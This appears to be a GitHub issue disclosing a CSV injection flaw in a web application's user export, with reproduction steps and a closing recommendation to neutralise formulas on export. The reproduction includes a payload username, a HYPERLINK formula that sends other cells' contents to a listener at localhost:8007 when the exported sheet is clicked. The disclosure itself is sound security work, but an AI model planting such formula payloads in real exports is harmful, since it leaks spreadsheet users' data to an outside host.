-
Notifications
You must be signed in to change notification settings - Fork 590
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CSV Injection Vulnerability #35
Comments
您好!您的邮件已收到,我会尽快回复!祝生活愉快!
|
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
The product has the CSV injection vulnerability,The premise is that you need to be in the login state
1, First create a low-privileged user
2, Log in to a low-privileged user and create a malicious user
Then send the package
Successfully added user named
=HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")
.xlsx
file, Open .xlsx log file, double-click the cell of =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). Then click an empty cell. And then click the cell of =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). In this case, a request is sent to the localhost:8007.First double-click the
=HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")
cellClick on a blank cell
Finally, clicking the original cell again will send a request to
localhost:8007
through the browserIt is recommended to shield the formula when exporting Excel to prevent the risk of CSV injection
The text was updated successfully, but these errors were encountered: